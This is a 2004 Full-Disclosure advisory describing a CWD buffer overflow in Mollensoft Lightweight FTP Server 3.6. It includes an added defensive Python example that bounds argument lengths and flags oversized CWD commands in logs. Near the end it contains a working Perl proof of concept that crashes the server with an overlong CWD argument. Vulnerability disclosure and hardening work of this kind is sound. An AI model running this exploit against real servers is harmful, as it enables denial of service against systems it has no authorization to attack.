[Full-Disclosure] Mollensoft Lightweight FTP Server CWD Buffer Overflow

From: Aviram Jenik (aviram_at_beyondsecurity.com)
Date: 06/01/04

    To: full-disclosure@lists.netsys.com
    Date: Tue, 1 Jun 2004 20:12:55 +0300
    
    

    Mollensoft Lightweight FTP Server CWD Buffer Overflow
    ------------------------------------------------------------------------

    Article reference:
    http://www.securiteam.com/windowsntfocus/5RP0L15CUM.html

    SUMMARY

    STORM has discovered a security vulnerability in
    <http://www.mollensoft.com/product2.htm> Mollensoft Lightweight FTP Server.
    Mollensoft Lightweight FTP Server's handling of the CWD command does not
    correctly verify that the argument supplied with the command fits in its
    internal buffers. This insufficient verification allows an authenticated
    (anonymous or otherwise) user to crash the FTP server, which attempts to
    read an arbitrary memory location, by issuing a malformed CWD command.
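
    The defensive counterpart to the flaw described above, as an added Python
    example that is not part of this advisory or of Mollensoft's server: a
    command-line parser that bounds the CWD argument before anything copies it,
    and a scan of captured control-channel lines that flags oversized CWD
    commands. The 200-byte argument limit, the 512-byte line cap, the
    COMMAND_RE pattern and the sample log lines are assumptions made for the
    example; the advisory itself only gives the crash range of 224 to 1018
    bytes.

```python
"""Added example: bound the CWD argument before it touches a fixed-size
buffer, and flag oversized CWD commands in captured control-channel lines.
Not part of the SecuriTeam advisory or of Mollensoft's server."""
import re

# The advisory reports crashes for CWD arguments of 224..1018 bytes. A server
# that rejects arguments above a much smaller bound never copies such data
# into its internal buffers. Both limits below are assumptions for this
# example, not values taken from the Mollensoft product.
MAX_CWD_ARG = 200   # longest pathname the server will accept
MAX_LINE = 512      # longest control-channel line, CRLF included

# One FTP command line: a 3-4 letter verb, an optional argument, CRLF.
COMMAND_RE = re.compile(rb"^(?P<verb>[A-Za-z]{3,4})(?: (?P<arg>.*))?\r\n$",
                        re.DOTALL)


def parse_command(line: bytes):
    """Validate one control line. Returns (verb, arg) on success; raises
    ValueError carrying the reply the server should send instead of
    copying the oversized data anywhere."""
    # Check the raw length first, before any parsing touches the bytes.
    if len(line) > MAX_LINE:
        raise ValueError("500 Command line too long")
    m = COMMAND_RE.match(line)
    if m is None:
        raise ValueError("500 Syntax error, command unrecognized")
    verb = m.group("verb").upper()
    arg = m.group("arg")
    if verb == b"CWD":
        if not arg:
            raise ValueError("501 Syntax error in parameters or arguments")
        if len(arg) > MAX_CWD_ARG:
            raise ValueError("501 Pathname too long")
    return verb, arg


def handle_line(line: bytes) -> str:
    """Return the reply text a hardened command loop would send."""
    try:
        verb, _arg = parse_command(line)
    except ValueError as err:
        return str(err)
    return "250 OK " + verb.decode("ascii")


# Constructed session log: "<client> <command line>" without CRLF. The 224-byte
# argument mirrors the advisory's PoC; the addresses are documentation ranges.
SAMPLE_LOG = [
    b"192.0.2.10 USER anonymous",
    b"192.0.2.10 PASS a@b.com",
    b"192.0.2.10 CWD pub/incoming",
    b"192.0.2.77 USER anonymous",
    b"192.0.2.77 PASS a@b.com",
    b"192.0.2.77 CWD " + b"A" * 224,
]


def find_oversized_cwd(log_lines, limit=MAX_CWD_ARG):
    """Return (client, argument_length) for every CWD whose argument is
    longer than `limit`; usable as a detection rule over FTP command logs."""
    hits = []
    for raw in log_lines:
        client, _, command = raw.partition(b" ")
        verb, _, arg = command.partition(b" ")
        if verb.upper() == b"CWD" and len(arg) > limit:
            hits.append((client.decode("ascii"), len(arg)))
    return hits


if __name__ == "__main__":
    print(handle_line(b"CWD pub\r\n"))
    print(handle_line(b"CWD " + b"A" * 224 + b"\r\n"))
    print(handle_line(b"CWD " + b"A" * 1018 + b"\r\n"))
    print(find_oversized_cwd(SAMPLE_LOG))
```

    The length check runs on the raw line before the regular expression sees
    it, so an overlong line is rejected without ever being parsed; the log scan
    is the same bound applied after the fact, which is what a sensor watching
    the control channel would do for a server that cannot be patched.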

    DETAILS

    Vulnerable Systems:
     * Mollensoft Lightweight FTP Server version 3.6

    Vendor Response:
    BigAl (author) responded with the following:
    I wrote this particular app with Visual Basic and used an FTP ActiveX COM
    component and I am waiting for the component creator to get back to me
    regarding the fix. Unfortunately I cannot snip off any of the commands, as
    access to the command length is not available from the VB component using
    straight VB Code. I am working on moving to .Net so hopefully I can have a
    new FTP server out by fall time frame which is truly multi-threaded and
    totally coded by me.
     
     Exploit:
     #!/usr/bin/perl
     #
     # Mollensoft FTP Server CWD Buffer Overflow (crash proof of concept)
     #
     # Orkut users? Come join the SecuriTeam community
     # http://www.orkut.com/Community.aspx?cmm=44441

     use strict;
     use warnings;
     use IO::Socket::INET;

     usage() unless (@ARGV == 2);

     my $host = shift(@ARGV);
     my $port = shift(@ARGV);

     # create the socket
     my $socket = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
     $socket or die "Cannot connect to host!\n";

     $socket->autoflush(1);

     # receive greeting
     my $repcode = "220 ";
     my $response = recv_reply($socket, $repcode);
     print $response;

     # send USER command (an anonymous login is enough; the flaw is post-authentication)
     #my $username = "%00" x 2041;
     my $username = "anonymous";
     print "USER $username\r\n";
     print $socket "USER $username\r\n";

     select(undef, undef, undef, 0.002); # sleep of 2 milliseconds

     # send PASS command
     my $password = "a\@b.com";
     print "PASS $password\r\n";
     print $socket "PASS $password\r\n";

     # send a CWD command whose argument is longer than the server's buffer
     my $cmd = "CWD ";
     $cmd .= "A" x 224; # Value can range from 224 to 1018
     $cmd .= "\r\n";
     print "length: ".length($cmd)."\n";
     print $socket $cmd;

     # read whatever comes back (an empty pattern matches the first line)
     $repcode = "";
     recv_reply($socket, $repcode);

     close($socket);
     exit(0);

     sub usage
     {
      # print usage information
      print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n
     <host> - The host to connect to
     <port> - The TCP port which the FTP server is listening on\n\n";
      exit(1);
     }

     sub recv_reply
     {
      # read lines from the socket until one matches the expected reply code
      my $socket = shift;
      my $repcode = shift;
      $socket or die "Can't receive on socket\n";

      my $res="";
      while(<$socket>)
      {
       $res .= $_;
       if (/$repcode/) { last; }
      }
      return $res;
     }
     

    ADDITIONAL INFORMATION
    SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
    finding this vulnerability.

    Regards,
    Aviram Jenik
    Beyond Security Ltd.

    http://www.BeyondSecurity.com
    http://www.SecuriTeam.com

    The First Integrated Network and Web Application Vulnerability Scanner:
    http://www.beyondsecurity.com/webscan-wp.pdf

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind.
    In no event shall we be liable for any damages whatsoever including direct,
    indirect, incidental, consequential, loss of business profits or special
    damages.

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

